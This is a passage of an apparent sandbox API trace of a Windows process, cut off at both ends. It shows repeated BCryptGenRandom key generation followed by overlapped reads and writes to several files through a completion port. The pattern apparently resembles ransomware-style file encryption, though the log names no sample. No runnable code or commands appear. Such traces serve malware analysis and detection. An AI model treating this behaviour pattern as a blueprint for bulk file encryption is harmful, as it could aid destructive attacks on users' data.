[0159.007] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0159.007] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.007] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.007] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0159.008] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.008] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.008] free (_Block=0x3e305b8) [0159.008] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.008] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.008] free (_Block=0x1fa91d0) [0159.008] free (_Block=0x1fa2ed8) [0159.008] free (_Block=0x1fa90b8) [0159.008] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0159.009] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0159.024] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x52d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0159.024] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0159.038] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7457, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0159.054] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0159.070] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x3ee3, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0159.081] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0159.089] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x5a56, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0159.105] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0159.120] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.121] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0159.121] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.122] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0159.122] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.122] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.122] free (_Block=0x3e305b8) [0159.122] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.122] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.123] free (_Block=0x1fa91d0) [0159.123] free (_Block=0x1fa2ed8) [0159.123] free (_Block=0x1fa90b8) [0159.123] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0159.123] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0159.124] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x6f50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0159.124] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0159.216] CloseHandle (hObject=0x170) returned 1 [0159.219] free (_Block=0x3df0008) [0159.219] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0159.255] CloseHandle (hObject=0x338) returned 1 [0159.256] free (_Block=0x1ff1e60) [0159.256] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0159.269] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x3620, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0159.270] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0159.285] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3df7, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0159.332] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0159.333] CloseHandle (hObject=0x170) returned 1 [0159.333] free (_Block=0x3df0008) [0159.333] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0159.344] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.345] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0159.345] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.346] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0159.346] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.346] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.346] free (_Block=0x3e305b8) [0159.346] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.346] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.347] free (_Block=0x1fa91d0) [0159.347] free (_Block=0x1fa2ed8) [0159.347] free (_Block=0x1fa90b8) [0159.347] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0159.347] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0159.359] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.360] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.360] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0159.360] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.361] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.361] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0159.361] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.361] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.361] free (_Block=0x3e305b8) [0159.361] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.361] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.361] free (_Block=0x1fa91d0) [0159.361] free (_Block=0x1fa2ed8) [0159.361] free (_Block=0x1fa90b8) [0159.362] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0159.362] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0159.373] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.374] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0159.374] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.375] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.375] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0159.375] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.375] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.375] free (_Block=0x3e305b8) [0159.375] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.375] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.376] free (_Block=0x1fa91d0) [0159.376] free (_Block=0x1fa2ed8) [0159.376] free (_Block=0x1fa90b8) [0159.376] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0159.376] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0159.389] CloseHandle (hObject=0x308) returned 1 [0159.389] free (_Block=0x3d70450) [0159.389] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0159.403] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x1672c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0159.418] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0159.428] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1b83a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0159.437] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0159.450] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.451] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0159.451] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.452] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0159.452] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.452] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.452] free (_Block=0x3e305b8) [0159.452] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.452] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.452] free (_Block=0x1fa91d0) [0159.453] free (_Block=0x1fa2ed8) [0159.453] free (_Block=0x1fa90b8) [0159.453] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0159.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0161.669] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0161.670] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0161.670] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1090, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0161.671] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0161.685] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x31f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0161.685] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0161.696] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.697] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.697] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0161.697] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.697] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.697] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0161.697] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.698] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.698] free (_Block=0x3e305b8) [0161.698] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.698] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.698] free (_Block=0x1fa91d0) [0161.698] free (_Block=0x1fa2ed8) [0161.698] free (_Block=0x1fa90b8) [0161.698] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0161.698] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0161.710] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.710] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.711] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0161.711] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.711] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.711] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0161.712] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.712] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.712] free (_Block=0x3e305b8) [0161.712] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.712] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.712] free (_Block=0x1fa91d0) [0161.712] free (_Block=0x1fa2ed8) [0161.712] free (_Block=0x1fa90b8) [0161.712] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0161.713] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0161.720] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.721] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0161.721] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.721] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0161.721] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.722] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.722] free (_Block=0x3e305b8) [0161.722] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.722] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.722] free (_Block=0x1fa91d0) [0161.722] free (_Block=0x1fa2ed8) [0161.722] free (_Block=0x1fa90b8) [0161.722] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0161.723] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0161.738] CloseHandle (hObject=0x338) returned 1 [0161.738] free (_Block=0x1ff1e60) [0161.738] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0161.747] CloseHandle (hObject=0x308) returned 1 [0161.747] free (_Block=0x3d70450) [0161.747] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0161.827] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x20d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0161.828] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0161.840] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x21d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.840] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0161.859] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2ad4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0161.864] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0161.878] CloseHandle (hObject=0x2a4) returned 1 [0161.878] free (_Block=0x1ff1e60) [0161.878] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0161.889] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.889] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0161.890] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.890] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0161.890] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.890] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.890] free (_Block=0x3e305b8) [0161.890] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.891] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.891] free (_Block=0x1fa91d0) [0161.891] free (_Block=0x1fa2ed8) [0161.891] free (_Block=0x1fa90b8) [0161.891] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, 